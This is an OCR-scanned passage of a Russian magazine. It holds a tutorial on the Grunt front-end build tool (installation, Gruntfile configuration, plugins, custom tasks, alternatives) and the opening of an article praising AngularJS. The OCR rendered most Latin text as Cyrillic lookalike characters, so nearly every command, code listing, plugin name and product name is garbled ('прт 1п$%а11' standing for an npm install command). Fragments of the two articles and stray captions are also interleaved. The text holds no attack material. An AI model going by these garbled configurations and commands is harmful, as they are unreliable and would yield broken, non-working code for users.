Во-первых, Грант создавался специально для фронтенд- 
разработчиков. С помощью плагинов (их уже несколько сотен) 
можно автоматизировать большинство повседневных задач 
клиентского разработчика. 

Во-вторых, он написан на знакомом тебе языке — уауа сир. 
А значит, ты легко можешь создавать свои задачи, если найти 
подходящий плагин не получится. 

В-третьих, благодаря использованию Моде.|$ он легко уста- 
навливается на всех популярных платформах: Мас, \\ЛЛпдом/$ 
и Ипих. 
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Для использования Гранта тебе понадобится установить Моде. ( ). 
Вместе с ним установится менеджер пакетов прт, который понадобится 
для установки как самого Гранта, так и плагинов. 

Для начала нужно установить консольную утилиту дгип\ф, которая будет за- 
пускать Грант, установленный в папке твоего проекта. 


$ прт 1п$%а11 #гип*-с11 -8 


Ключ -д означает, что пакет будет установлен глобально (а не только 
для текущего проекта). Вероятно, понадобится запустить прт через зидо или 
открыть консоль под администратором. 


Чтобы начать использовать Грант в твоём проекте, создай конфиг — «грант- 
файл». Это обычный У$-файл с именем Сгитйе.|$ (можно использовать 
и СоНееЗсирф, тогда файл должен называться Сгите.соНее). Грантфайл 
выглядит примерно так: 


тоЧч1е.ехрог*$ = (вгип®) { 


5ГИПЕ. 111 СопйЯ ( { 


сопсат: { 
та1п: { 
С о-в лье ЗЕ 
е$е: "Би11А/$сг1рт$.]$' 


| 
Е 


5гипт.]оааМртТа$К$ ('вгип{-сопг16-сопса*'); 


Просто набери в терминале: 
$ вгипе 


Грант выполнит задачу аетаий, которая запустит задачу сопсат. Во время 
разработки удобно запускать Грант с ключом --4еБид. Задачи могут исполь- 
зовать его по-разному. Например, дгит-сотиб-$Уи$ в отладочном режиме 
не сжимает С$$-код. 


$ вгипЕ --аебив 


Еще два ключа, которые могут пригодиться, если что-то пойдет не так: 
--уегро5е будет выводить подробную информацию обо всем, что делает 
Грант в данный момент, --ЗасКк покажет $Заск 1гасе, если выполнение было 
прервано из-за ошибки уауа$сирт. 


ооо пуаммезотерго]еси! (Ба$|) ый 


^/туамезотерго]ес{ 
> 


бопе, им1{Поцф еггог$. 


-/туамезотерго) ест 


и 


Первый запуск Гранта 
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м ле Гы кабин Разд. бин 


Главная страница 
проекта СгипЕ 


= бани Батыя Я Рыреь Г бооитеевиный = А АИ 


ле Мега Му ие а Так гиппег? Му цзе Спой? 


Ргип{ .гер1$+егТазК( 'Чефаи1*', ['’сопса*']); 
}; 


В грантфайле описываются параметры задач (у нас пока одна — сопса{ — 
склеивание нескольких файлов в один), подключаются плагины (о них ниже), 
задаются группы задач (предпоследняя строчка). 

В Гранте нет встроенных задач, для любой задачи нужно устанавливать 
плагин. Но сначала нужно создать еще один файл, который сильно облегчит 
работу с Грантом. Выполни прт ШК и ответь на вопросы, которые он задаст. 
(Можно просто нажимать <Ещег> — эти поля нам не понадобятся.) Теперь 
унас появился файл раскаде.]оп: в нем прт будет сохранять имена и версии 
установленных пакетов. Это позволит устанавливать все зависимости (Грант 
и плагины) одной командой (прт та!) и быть уверенным, что проект не пе- 
рестанет собираться из-за новой версии какого-то плагина. Теперь можно 
установить первый плагин (и сам Грант): 


$ прт 1п5%а11 вгийЕ вгип-соп&г16-сопса* --зауе-де\м 


Ключ --заме-ае\у добавляет ссылку на пакет в раскаде.]зоп. 


ГРАНТ НА ПРОДАКШНЕ 


Если тебе интересно, как я использую Грант в боевых условиях, 
взгляни на парочку небольших примеров грантфайлов, решающих 
наиболее типичные задачи разработчика. Весь код прокомменти- 
рован и доступен на СИНиЬБ: 


УОЧЕВУ-ПЛАГИН 

Грантфайл моего |Очцегу-плагина Зоса! Кез 
собирает два файла дистрибутива: 

. 45: минифицированный исходный код; 

. _ С$$: компиляция ЗМУч$, оптимизация с помощью С$$0. 


. Грант 


Аеще: 

._ иконки оптимизируются с помощью итодо и внедряются в С$$ 
на этапе компиляции 5Ми$; 

. вначало сжатых /$ и С$$ добавляется комментарий с копи- 
райтом и текущей версией плагина, которая достается из фай- 
ла Бомег.]5оп (конфиг менеджера браузерных пакетов Во\мег); 

. Чо проверяется с помощью УЗНИ\. 


СТАТИЧЕСКИЙ САЙТ 

Грантфайл небольшого статического сайта: 

. компиляция ЗУ и$; 

. проверка {$ с помощью УЗНтЕ 

. склейка $ в один файл; 

._ минификация $ с помощью Чоу; 

. оптимизация графики с помощью итоо; 

. создание 1Р-архива для отправки клиенту; 

. отслеживание изменений в исходных файлах с перезагрузкой 
страницы в браузере. 


ЗАДАЧИ, ПОДЗАДАЧИ, ПАРАМЕТРЫ 
Подробнее разберем внутренности грантфайла. Конфигурация большинства 
задач выглядит примерно так: 


сопсае: { 

ор 1оп$: { 
серагафог: ‘';' 

}, 

116$ { 

_ Ре 157657715, 
дез*: "'Би11а/116$.]5' 


ВРЕЕ | 
ВВ ЕЯ Вы 5МЕ 
')5/та1п. 5" 


], 
дез: "'Би11а/5сг1рт$.]5' 


Сопса{ — это задача. Обычно имя задачи совпадает с именем грант- 
плагина, который за нее отвечает. В нашем случае это плагин дгит- 
сопиЮ-сопсат. В других системах сборки задачи обычно называют целями 
({агае{). 

СопсаЕ1$ и сопса:тат — это подзадачи, они позволяют запускать одну 
задачу для разных исходных файлов. В орНоп$ определяются общие для всех 
подзадач параметры. Можно принудительно запустить любую задачу или 
подзадачу: 


$ вГгипЕ сопсаё # Задача сопса* 
$ египЕ сопса*:та1п # Подзадача сопса*:та1п 
$ вгипЕ сопса ич211Фу # Задачи сопсаф и и211Ру 
СПИСКИ ФАИЛОВ 
Список исходных файлов можно задать тремя способами: один файл, массив 
файлов и генератор. Один файл: 
‘3 5/та1п.]$' 
Массив: 
[ '3$/ч{11$.]$', ']$/та1п.)5' ] 

Можно использовать маски (9106, * — любые символы, /**/ — папка лю- 
бой вложенности). Однако с масками нужно иметь в виду, что порядок фай- 
лов может оказаться любым. Это может привести к проблемам, например 
при склейке С$$- или /$-файлов. 


5711667". 5, Пе 6". 5’ | 


Динамическая генерация списка сложнее, но и функциональнее. 


БЫСТРОЕ 
ПОДКЛЮЧЕНИЕ ПЛАГИНОВ 


Думаю, тебе уже надоело добавлять для каждого плагина строчку 
дгит./оааМртТазк$(‘имяплагина’), поэтому лучше сразу заменить 
все вызовы |оа@МртТазк$ одной строкой: 


гедитге ( 'тафспаер') .#1Еег)ем(' вгип*-*'). = 
фогЕасй ( вгип{ .1оаЧМ№МртТа$К$); 


И установить таспаер: 
$ прт 1п5%а11 маеспаер --зауе-адем 


Эта строка вызовет 1оааМртТазк$ для всех плагинов, установлен- 
ных с ключом --за\ме-ае\. 
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{ 
ехрапа: гие, // Включение динамической генерации 
см: ‘116 ', // Родительская папка исходных файлов 
гс: ['**/*.]5'], // Маска исходников (относительно сма) 
дез: "Би11а/`, // Папка для результирующих файлов 
// Дальше - необязательные параметры 
ехё: „м. 15’, // Расширение результирующих файлов 
ПаЕеп: гие, // Складывать все файлы в одну папку 
// (без подпапок) 
гепате: Фипс1оп(паме) 
гефигп пате. гер1асе("618','5та11'); 
} 
в. 
ШАБЛОНЫ 


Внутри параметров конфига можно использовать шаблоны. Грант использует 
шаблонизатор из библиотеки 1о-БВазй 1одазп.сот. С помощью шаблонов мож- 
но повторно использовать параметры конфига, вставлять текущую дату в имя 
результирующего файла и использовать любые конструкции яваскрипта. 


сопса*: { 
та1ип: { 
РС 151.8 
ае5*: "6и119/5сг1ре$.]5' 


} 
}, 
иОату: { 
та1п: { 
в1ез: { 
// «Копируем» другой параметр конфига 
//_и добавляем текущую дату в имя файла | 
'Би114.<%= вгипй®.%етр1Та{е .*одау ("т-а-уууу") %>.]$':= 
'<%= сопса*.та1п.ае$* %>' 
} 
} 
| 


А воттак можно использовать данные из /5$ОМ№М-файла: 


рк=: вгип*.Я1е.геаа350М( 'расКаве. ]зоп'), 
Баппег: '/* <%= рКВ.паме %> \<%= рКв.мег$1оп %> */' 


ИРТАФу: { 
та1п: { 
#1ез: { 
'<%= рК=.патме %>.т1п.]5': '<%= рКе.пате %>.]5' 
} 
| 
} 


ОСгип Детр!а{е 1одау и дгит.Ше.геада/ $ОМ — функции из АР! Гранта. Там 
довольно много удобных функций, которые можно использовать при напи- 
сании собственных задач (об этом мы поговорим чуть позже). 


Работа над сайтом с использованием Сгип $ 


ви р 


СКЛЕИВАНИЕ 4$-ФАИЛОВ 
Для склеивания любых файлов используется плагин соп!6-сопса+{. В про- 
стейшем случае его конфигурация выглядит так: 


сопса*: { 

та1п: { 

5ис: [']$/)ачегу.]5', '3$/ч{11$.]5', ']5/та1".]$'], 

дез: "Би11а/$сг1рт$.]5' 

} 
ОВ 


Не забудь добавить в грантфайл плагин дгит{-соп6-сопсаЕ: 


5гипт .1оааМртТа$К$ ( 'вгип*-сопг16-сопса*'); 


Добавь задачу в ЧЕТаи\, чтобы она запускалась при запуске Гранта без па- 
раметров: 


5ГиПЕ .ге21$фегТазК ( 'АеРаи1', ["'сопса*']); 


И установи соответствующий пакет из прт: 


$ прт 1п5$а11 вгип&-сопг16-сопсаЕ --зауе-аем 


Вместо <%= сопса{.тат.4е${%> будет подставлен путь результирующего 
файла задачи сопса{ (предыдущий раздел). Часто нужно добавить в начало 
сжатого файла комментарий с копирайтом. Это можно сделать с помощью 
свойства Баппег. 


и511Ру: { ПЕ 
ор{1о0п$: { 
баппег: "/* АчеВог: ЭЗойп $мтеЙ, += 
<«%= вГиПф.фетр1афе.%одау("уууу") %> */' 


}, 
та1п: { 

#1ез: {... } 
} 


ЗАПУСК С$$-ПРЕПРОЦЕССОРОВ 

Для Гранта есть плагины для всех популярных препроцессоров: ЗА$$, ЕЕ$ $ 
и ЗУч$ (сопЬ-5а$$, сотиЮ-е$$ и соб -$МУщ5$). Я использую Э\Ум$, поэто- 
му и покажу на примере этого препроцессора. 


МИНИФИКАЦИЯ +5$-ФАЙЛОВ 5У1и$: { 
Плагин соп6-иоШу сжимает уауа$ сир: с помощью Ч9Шу!5. та1т: { 
#1е5: { 
и511Фу: { 'Би11а/5у1е$.с55': "'5%&у1е5/1паех.$%у1' 
та1пт: { } 
#1ез: { } 
'Би11а/$сг1ре$.т1п.]5': '<%= сопсаф.та1п.аезе %>' } 


КОНФИГУРАЦИИ 


Конфигурации позволяют переключаться между 
боевой и отладочной версиями сайта. В явном 
виде в Гранте их нет. Но можно сделать так: 


сопса*: { 
таз": { 
Е 5.8 
дез: 'Би11а/5сг1ре$.)5' 


| 
}, 
и211Ру: { Е 
таз": { 
81е$: { 
'<%= сопса*.та1п.Ае$Е %>': «= 
'<%= сопса*.та1п.ае$* %>' 
} 
} 
} 


5ГИПЕ.Гге215{егТазК( 'Аефаи1*' , [ 'сопса*"' ‚= 
‘и511у']); 
5ГИПЕ.ге215егТазК( 'аебие' ‚ [ 'сопса*' ]); 


Отладочная версия собирается так: дагит аебио, 
а боевая — просто адгийт. НТМЁЕ в обоих случаях 
не меняется, но в последнем варианте код будет 
дополнительно сжат. 

Для более крупных проектов может понадо- 
биться что-то сложнее. Например, Ведиге/$ и/ 
или подключение разных файлов в шаблонах 
с помощью плагина ргергосез$. Иногда бывает 
полезно знать, собирается ли отладочная версия 
в /5- или С$$-коде. Например, если есть какой- 
то отладочный код, который не должен попасть 
в продакшн. Можно было бы перед запуском С$$- 
препроцессора или Чау прогонять код через 


препроцессор (например, упомянутый уже плагин 
ргергосе$$), но это добавит лишний шаги нарушит 
синтаксис исходных файлов, что затруднит работу 
сними в ОЕ. Однако можно повнимательнее 
изучить уже используемые в проекте плагины 

и, вероятно, обнаружить, что есть способ проще. 
Например, для {$ (если используется Чайу!$) 

и 5Ми$ такой способ есть. 

В ЧаМу/$ уже есть что-то вроде встроенного 
препроцессора: переменная в коде заменяется 
значением, а образовавшийся мертвый код (№ 
(Га15е) { /* Например, такой */ }) удаляется из ре- 
зультирующего файла. 


УР [ 
ор1оп$: { 
сотрге$$: { 
510оба1_аефз: { 
ОЕВУб: дебие? // Та самая 
// переменная 


} 
} 
}, 
та1т: { 
81е5: { 
'<%= сопса*.та1п.ае$Е %>': += 
'<%= сопса*.та1п.ае$* %>' 
} 


Пример использования переменной в $: 


1 (Еурео+ ОЕВУ@ === 'ипдейпед') «= 
ОЕВУб = гие; 
1+ (ОЕВУб) { 


а1ег*('Это сообщение появится «< 
только в отладочном режиме’); 


Первая строка включает отладочный режим 
по умолчанию. Таким образом при сборке 
проекта без задачи идШМу отладочный код будет 
выполнен, а при сборке с ней — вообще удален 
из файлов. 

В $ и$ все еще проще. Грантфайл: 


5у1и$: { 
РРООЦСЕТОЙ 
81ез: { 
"Би11а/5{У1е$.с5$": += 
'5{у1е5/1паех. 5%у1' 
} 
}, 
деБие: { 
ор1оп$: { 
девпе: { 
ОЕВУСб: аеБив 
} 
}, 


в]1ез: { Е 
'6Би119/${у1е$.с$$": += 
'5{у1е$/1паех. ${у1' 


И пример использования: 


ОЕВУ@ ?= %гие 
а1\ 
ои{11пе: 1рх $0114 #с@Рее 1+ ОЕВУС 


Для проверки уауаспрЕ на ошибки есть плагин сот -|$ Пт. 


Э$И1ие: { 
ор{1оп5: { 
Бгом$ег: р 
мИ1е: В 
стагЕФаб$: $ 
еаедед: ы 
1ттеа: ы 


1афеде+: ь 
пешсар: Я 
ипаеф: 1 й 
{га111п5: 3 
Эдчегу: 


}, 
ев: ‘ее. 


} 


Удобнее хранить параметры УЗНИ в отдельном У5ОМ-файле — .|]зИтис. 


Э$И1ие: { 
ор1оп5: { 
Э$И1и ис: "'.)]5И1иис" 


НИ ЕЕ Е 
п е5: ‘19/7. 6. 
} 


Этот файл может быть использован не только Грантом, но и, например, 
консольным УЗНИТ или плагином ЗиЫйтеЧщег для ЗибИте Теж. 


ОТСЛЕЖИВАНИЕ ИЗМЕНЕНИЙ 

Плагин сотиб-масй запускает задачи при каждом изменении указанных 
файлов. Например, можно запускать С$$-препроцессор при каждом изме- 
нении исходных файлов: 


5фу1и$: { 
таз: { 
'Би11а/5{У1ез.с55$': "'5%у1е5/1паех.5*у1' 
} 
|, 
маесИ: { 
5фу1и$: { 
#]е5: '$$у1е5/**/*.5%у1', 
фазК$: '5%у145" 


Недавно в сомиб-ма{сй появилась возможность использовать ИмеВеюоаа 
(раньше для этого нужен был отдельный плагин): 


мафсИ: { 
5фу1ис: { ООО 


БЫСТРАЯ ИНИЦИАЛИЗАЦИЯ (ЗСАЕРОЕОМб) 
ПРОЕКТОВ С ПОМОЩЬЮ СВОМТ-1МТ 


Если установить дгип-йИ (п ) и набрать в консоли: Г чез+ 
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#1е5: '5%у1е5/**/*.5%у1', 
фазК$: '5%у1и5', 
ор1оп$: { 

11уеге]оаа: 


| 


Теперь, если установить плагин Имевеюаа для браузера, страничка сама 
будет перезагружаться при изменении и перекомпиляции исходных файлов. 
Аеще можно запускать сразу несколько задач при изменении файлов: 


мафсИ: { 
5фу1и$: { 
#1е5: '$у1е5/**/*.5%у1', 
фазК$: ['5%у1и5', 'аифоргейхег', 'с5$0' ] 


} 


Веб-сервер 

Простейший веб-сервер для статических сайтов — плагин сопЬ-соппесф. 
У него есть одна особенность, о которой нужно помнить: сервер будет рабо- 
тать, пока выполняются какие-то другие задачи. Чтобы сервер не закрывался 
сразу после запуска, нужно использовать параметр Кеерайуе: 


соппес*: { 


фез*: { 
ор*1оп$: { 
роге: 8006, 
Базе: '.'’, 
Кеера11\е: 
} 
| 


} 


или запускать задачу соппес{ одновременно с какой-то длительной задачей, 
например ма{сп: 


соппес*: { 


ее: { 
ор10оп$: { 
роге: 8000, 
Базе: '.' 
} 
} 
у, 
маЕсИ: { 
} 


В обоих вариантах твой сайт доступен по адресу 


ПОЛЕЗНЫЕ ПЛАГИНЫ 
ДЛЯ ГРАНТА 


Все плагины можно найти на сайте Гранта: 


| Мусоо1Рго4есе_+ез*.$ 


вгипф-1п1 поде 


Это очень мощный инструмент (у меня уже 
больше десятка собственных шаблонов, и в 
интернете можно найти много готовых), заслу- 
живающий отдельной статьи. 


то получится вот такое дерево файлов: 


$ 1гее 


бгипЕВТе. $ Если кратко, то дги{-: 


ЕТСЕМЪЕ-МТТ е создает файлы и структуру папок; 

ВЕАОМЕ . та » позволяет использовать шаблоны везде, где 
116 ТОЛЬКО МОЖНО; 

— МуСоо1Рго} ест. /5 ‚ переименовывает файлы при копировании; 


расКазе. ] оп . 


задает пользователю уточняющие вопросы. 


ащоргеНхег — добавление вендорных пре- 
фиксов; 

с$50 — оптимизация С$$; 

ехес — запуск исполняемых файлов; 

тдо и ипатт — оптимизация веб-графики; 
ргергосез$ — препроцессор: условия, под- 
становка переменных и тому подобное; 
гетоуе-юдадтод — удаляет из 4$ вызовы 
соп50е.10(0(); 

зипо-герасе — замена строк в файлах; 
мебТопт — конвертер 5\/С-файлов в веб- 
шрифт. 
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Свои задачи делать довольно просто. Для примера сделаем задачу, которая 
будет запускать из Гранта консольный оптимизатор веб-графики птдо (51. 
[у/7186С7). Стоит рассматривать эту задачу только как пример. Для реаль- 
ной работы лучше использовать дги\{-итдо (БИЛу/ОЗТУЕК) или дгит-сотию- 


нтадетт (6.1у/114уМ!й). 


КОНФИГ 
Задача будет принимать список изображений и запускать итдо для каждого 
файла. Для этого нам понадобится всего лишь один параметр: 


1180: { 

1тадез: { 

5ГС: '1тарез/**' 

} 
} 
КОД ЗАДАЧИ 
Добавить задачу можно двумя функциями: 
. одгипе.геодзегМишТа$К — задача с подзадачами, как сопсаф, идШу 


и как описано в подразделе «Задачи, подзадачи, параметры» выше. Нам 
нужна именно такая; 

. дгит.геотзегТа$К — используется для задач-ссылок (как АеТаий выше) 
или задач, где несколько наборов входных данных не имеют смысла. 


// Добавляем задачу 1тго 
5гип® .гер15${егМи1{1Та$К('1т50', 'Ор*1т17е 1табез и$1п8 1720’ ‚= 
ФипсЕ топ () { // Говорит о том, что вся задача асинхронная 
уаг 4опе = {И15.азупс(); 
// Обрабатываем каждый файл (тоже асинхронно, потому что 
// зрамп() асинхронный). В %11$.А1е$5гс находится список 
// файлов текущей подзадачи с уже развернутыми масками 
// (другие параметры были бы в +11$.4афа) 
ГИП. 911 .азупс. огЕаси (115.#11е55$гс, РипсЕтоп (Я1е, = 
пехЕ) { 
// Создаем процесс 1тво, передаем ему имя текущего 


// файла 


Грант — далеко не единственный инструмент для автоматизации труда раз- 
работчика. Хотя, на мой вкус, для фронтенд-разработчика он наиболее удо- 
бен. Условно такие инструменты можно разделить на три группы. 


КЛАССИЧЕСКИЕ СИСТЕМЫ СБОРКИ: МАКЕ, АМТИ ДРУГИЕ 

К недостаткам можно отнести неприспособленность к задачам фронтенд- 
разработчика (придется много делать самому то, что в Гранте уже есть го- 
товое) и необходимость изучать новый язык написания скриптов (вместо 
привычного яваскрипта). Также тебе придется отдельно устанавливать все 
утилиты, которые будут использоваться для сборки: иду, соНее и другие. 
Но если ты уже применял такие инструменты в другой среде, то использова- 
ние их для фронтенда может быть оправданным. 


КОНСОЛЬНЫЕ СИСТЕМЫ СБОРКИДЛЯ ФРОНТЕНДА 

Изнаиболее популярных стоит отметить Впитсй и\Уеотап. 

‚ Вгипсй (БгипсПп.ю) гораздо проще в использовании, но менее гибкий, 
и для него существует всего лишь десятка три плагинов (для Гранта уже 
несколько сотен). В Бранче есть встроенный генератор проектов (есть 
разные «скелеты»: Васкбопе-приложения, Апацаг-приложения и другие), 
веб-сервер, вотчер и плагины для компиляторов, препроцессоров, мини- 
фикаторов и тому подобного. Бранч позволяет двумя командами в терми- 
нале развернуть веб-приложение, запустить веб-сервер и начать с ним 
работать. При этом после каждого изменения оно будет автоматически 
пересобираться, а страничка в браузере — перезагружаться. 

. Уеотап (уеотап.10) с трудом можно назвать альтернативой Гранта, по- 
тому что это скорее продолжение Гранта. Йомен состоит из трех частей 
(все они могут использоваться как отдельные инструменты): \Уо — генера- 
тор приложений (более продвинутый аналог дгит-тй), Сгит и Вомег — 
менеджер пакетов для фронтенда (как прт, но для браузера). Раньше 
для вызова всех трех инструментов использовалась команда уеотап, 
но сейчас \о, Сгипй{ и Во\мег используются сами по себе, а Йомен теперь 
скорее субъективное воркфлоу, основанное на этих инструментах. 
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ГИП . и 11. зрамп ( { 
ста: '1150', 
агв5: [11е] 

}, пех{); 


}, аопе); 


}); 


Задача должна быть асинхронной, потому что мы будем вызывать внеш- 
нюю программу, ав Мосче.|$ это асинхронная операция. Вызов 1115.азупс() го- 
ворит Гранту, что наша задача асинхронная, и возвращает функцию, которую 
необходимо вызвать, когда все файлы будут обработаны. Сам цикл по ис- 
ходным файлам тоже асинхронный. Для этого используется метод ТогЕасп 
из модуля азупс. 


ХРАНЕНИЕ И ИСПОЛЬЗОВАНИЕ 


Задачи можно класть прямо в грантфайл, а можно в отдельные файлы или 

публиковать в прт (если твоя задача может быть полезна и другим людям). 

1. Первый способ самый простой. Для этого надо разместить код задачи 
где-нибудь перед дгит{.геде!ТазКк(‘аетаи!, [...]). 

2. Во втором случае нужно создать для задач отдельную папку и поместить 
код задачи в такую же обертку, как и у грантфайла: 


тоаи1е.ехрогЕ5 = Фипс1оп(вгий®) { 
ГИП .ге215$егМи11ТазкК('1т2о', 'ОрЕ1т1хе 1тавез и$1п8в «= 
1т20', ФипсЕ1Топ() { 
Вы 
5 
}; 
А вгрантфайле написать: 
5гипе.1оаТа$К$( 'фа$К5'); 


//_Загружает все задачи из папки 
// фа$К$ 


ГРАФИЧЕСКИЕ СИСТЕМЫ СБОРКИ ДЛЯ ФРОНТЕНДА 

Очевидный плюс — графический интерфейс и простота установки и исполь- 

зования. Минусы: сложность (а то и невозможность) расширения и настрой- 

ки; невозможность хранить конфигурацию сборки в самом проекте; ограни- 
ченная поддержка операционных систем и платность большинства программ. 

. Соаекй (пс!9еп{57.сот/содеки, Мас, 25 $). Очень прост в использова- 
нии: достаточно перетащить папку проекта в программу, и он сам опре- 
делит все используемые в проекте языки, сам настроит и запустит все 
компиляторы, будет следить за изменениями исходных файлов и переза- 
гружать браузер. 

. Наттег (паттегюогтас.сот, Мас, 24 $). Основное предназначение — 
упростить разработку простых статических сайтов. Кроме препроцессо- 
ров, минификаторов и прочего, тут есть встроенный НТМЕ-препроцессор 
и шаблоны новых проектов. 

. ЦуеВеюач (Пуегеоа9.сот, Мас, 10 $). Сборщиком его можно назвать 
с натяжкой. Основное предназначение — отслеживать изменения в фай- 
лах и перезагружать страницу в браузере. Однако он может и компилиро- 
вать код С$$-препроцессоров или СоНееЗсир+. 


ЗАКЛЮЧЕНИЕ 


Не удивлюсь, если после прочтения этой статьи Грант показался тебе 
слишком сложным. Действительно, довольно трудно сразу во всем 
разобраться, а в разделе «Альтернативы» есть инструменты, пользо- 


ваться которыми гораздо проще. Но, на мой взгляд, в Гранте наилуч- 
шим образом сочетаются умеренная простота использования, почти 
безграничные возможности настройки и расширения и огромное ко- 
личество уже готовых плагинов на все случаи жизни. 2 
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АМСОГАНШЪ5: 


ФРЕЙМВОРК, 
КОТОРЫЙ 
НАМ НРАИЦА | 


ТТ 


- 


Новая жизнь старого ]ауа$ спрЕ, 


к которому тоже приложилась корпорация добра! 


Старичок Чауа$ спирт, по правде говоря, был той еще хренью. 
Такую солянку подходов в разработке и хроническую 
неприязнь сообщества к проверенным временем методикам 


проектирования мне никогда не доводилось видеть. 

Игорь «Зриег МЕТ» 
Антоно 

апюпом. 1900г. КА ®атай. сот 


Потребовались долгие годы, чтобы в это мрачное царство 


№) уфоппе и 
стали пробиваться лучи света под названием «фреймворки»... ( 


ки 
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ТЕМНАЯ СТОРОНА ЗА\/АЗСНРТ 


Язык изначально позиционировался как простой, и, чтобы 
как-то привлечь внимание профессиональных разработчиков, 
его синтаксис постарались притянуть к великой чуама, но поло- 
жительных результатов эта практика не принесла. В уауасир{ 
разразился хаос, и долгое время творилась самая настоящая 
вакханалия. Профессионалы не спешили применять сомни- 
тельную новинку, а новички не сильно задумывались о качестве 
кода. В итоге язык превратился во второсортный инструмент 
для написания неуклюжих вещей, способных хоть как-то ожи- 
вить страницы того времени. 

Но неужели проблема только в отсутствии профессиона- 
лов? Ведь рано или поздно новички должны были превратиться 
в гуру? Да, должны, но причины лежали и в самом языке и его 
архитектурных проблемах. Разработку уауаЗсирт можно срав- 
нить с гонками «Формулы-1» — спорткары развивают реак- 
тивную скорость, но крайне ненадежны. Времени на создание 
языка было потрачено непростительно мало. Добавим сюда 
внезапную смену концепции проекта (изначально уамаЗсирт 
планировался как функциональный язык) — и в итоге получили 
то, что получили. Местами запутанный синтаксис, непредска- 
зуемость работы некоторых операторов, бесконечные нюансы 
со слабой типизацией, проблемы с областью видимости пере- 
менных и кучу других дефектов, способных нарушить психику 
людей, привыкших работать с нормальными языками. 

Первым, кто отважился по-настоящему развернуть непо- 
воротливый уауаЗсирт, стал Джон Резиг. Он разглядел в гадком 
утенке невидимое изящество и решился взяться за одну из са- 
мых важных нато время проблем — покончить с беспрестанным 
переписыванием одного и того же кода. В то время он занимал- 
ся разработкой сайта компании Вгапа 1о9/с и нюансы уама$ спра 
прочувствовал на собственной шкуре. 

Результатом его рвения стал первый релиз библиотеки 
Очегу. Она должна была не только решить проблему одноразо- 
вого кода, но и добиться хоть какой-то кросс-браузерности. 
Не остался без внимания и синтаксис ЧауаЗспр\. Библиоте- 
ка позволила сократить многие монструозные конструкции 
и стала самым настоящим кусочком «синтаксического сахара». 
С каждым новым релизом библиотека совершенствовалась 
и вбирала в себя новые возможности. Сегодня |@чегу входит 
в число обязательных инструментов любого веб-разработчика, 
и представить современный сайт без ее (или альтернатив) ис- 
пользования уже проблематично. 

Ну а дальше началось самое интересное. |Очегу показала, 
что Чама$спирт способен на многое, и, возможно, именно это по- 
служило своеобразным пинком для многих игроков веба. К язы- 
ку стали относиться более снисходительно, и его начали всяче- 
ски развивать. Чего только стоит пример Сооде, подаривший 
нам быстрейший уауаЗсирА-движок \8! Благодаря ему появи- 
лась возможность создавать тяжелые /$-приложения. Открыв- 
шиеся перспективы стали подспорьем для создания принципи- 


ЛИСТИНГ 1. ПРЕДСТАВЛЕНИЕ 


<ПЕт1 ап п' "Еоаот\ус" > 


<Фогт 14= ^ 


й нам нраица 105 


Первым, кто отважился по-настоящему 
развернуть неповоротливый Лауа$ спреЕ, 


был Джон Резиг. Результатом его рвения 
стал первый релиз библиотеки |Оие 


ально новых технологий на базе уауаЗ спирт. Достаточно назвать 
Моде.]5, и сразу становится ясно, что сегодня Чауа$ спирт — на- 
много больше, чем скриптовый язык. Сегодня он готов взять 
на себя все этапы создания приложения (клиентскую и сервер- 
ную часть), не прибегая к вспомогательным инструментам. 


ОНИ ПРИШЛИ С МИРОМ 


На смену библиотекам вроде |Оиегу в сообщество уамаЗспрт 
стали приходить фреймворки, реализующие популярный пат- 
терн М\УС (М\М\УМ, МУР и так далее). Фреймворки стали при- 
носить новую культуру разработки и альтернативные взгляды 
на устоявшиеся в умах девелоперов вещи. Все больше стали 
подниматься вопросы применения паттернов, хорошо заре- 
комендовавших себя в мире большого программирования, 
ив умах /$-разработчиков наконец-то стала укладываться ак- 
сиома: «Нельзя мешать логику с представлением». 

Преимущества фреймворков по сравнению с изобретением 
собственных «труповозок» видны невооруженным глазом. Одно 
из самых существенных, на мой взгляд, избавление от рутин- 
ного кода, который тянется от проекта к проекту. Фреймворк 
предоставляет разработчикам каркас будущего приложения 
и решение задач, встречающихся в большинстве проектов. На- 
пример, программисту не нужно думать, как принять данные 
от клиента и передать их на сервер, — все необходимое реа- 
лизовано авторами фреймворка. Вместо этого разработчику 
предлагается сосредоточиться на функционале собственного 
приложения. 

Другим немаловажным плюсом всех фреймворков будет 
стандартизация кодирования. Если разработчик решается 
применять готовый каркас в своем проекте, то он должен быть 
готовым следовать его заповедям. Это значит, что ему нужно 
не полениться один раз ознакомиться с правилами, и можно 
быть спокойным: впоследствии код без проблем может дора- 
батываться другими разработчиками. Новому девелоперу бу- 
дет проще разобраться в хорошо документированной структу- 
ре (особенно если он уже имел опыт работы с этим решением), 
чем понять чей-то оригинальный велосипед. 

Лежащий в основе большинства современных фреймвор- 
ков паттерн проектирования М\УС хорошо зарекомендовал 
себя и теперь стал доступен для уауаЗспр{-мира. Конечно, 
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особой новизны и революции в этом событии нет. Любой про- 
двинутый разработчик может без всяких фреймворков спроек- 
тировать приложение, следуя этому паттерну. Однако «может» 
И «обязывают» — разные веши. Учитывая, что в /5-сообществе 
на передовые методики долго все клали железный болт, то тре- 
бование применять паттерн со стороны фреймворка будет 
весьма кстати. 


АМСИЕАВ$ 


Проект Апац!ак/$ относительно новый. Впервые он был пред- 
ставлен в 2009 году. За это время вышло несколько версий 
и вокруг продукта сколотилось плотное сообщество. Успех про- 
екта во многом определил его родитель — компания Сооде. 
К релизам корпорации добра гики относятся с особым трепе- 
том, особенно если речь идет об инструментарии для разра- 
ботчиков. В этот раз получилось то же самое. Не буду вдаваться 
в технические дебри, а лучше сразу расскажу, чем зацепил про- 
ект лично меня. 


ПРЕДЕЛЬНАЯ ПРОСТОТА 

С одной стороны, Апд\аг/$ имеет достаточно низкий порог 
вхождения по сравнению со многими подобными решения- 
ми. С другой — документация носит слегка противоречивый 
характер. Она вроде бы хорошо структурирована, есть приме- 
ры кода, но некоторые вещи освещены крайне слабо. С ними 
придется разбираться самостоятельно, изучая исходники или 
запрашивая комментарии от коллег по цеху. Например, по- 
нять работу зсоре (областей видимости) помогут комментарии 
Мишко Хевери (М!5Ко Неуегу) на ЗЗаскО\уегНом/ и просмотр ви- 
део Апоцаг/5: Вез{ Ргасисе$з ( }: 


ДЕКЛАРАТИВНЫЙ ПОДХОД 

Разработчики Апацаг отошли от традиционной идеи: «НТМЕ — 
враг, и нужно с ним бороться». Вместо этого они решили есте- 
ственным образом расширить язык разметки, введя дополни- 
тельные директивы. 


ЛИСТИНГ 2. КОНТРОЛЛЕР 
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Проект АпдШа $ относительно новый. 
Впервые он был представлен в 2009 году. 


Успех проекта во многом определил его 
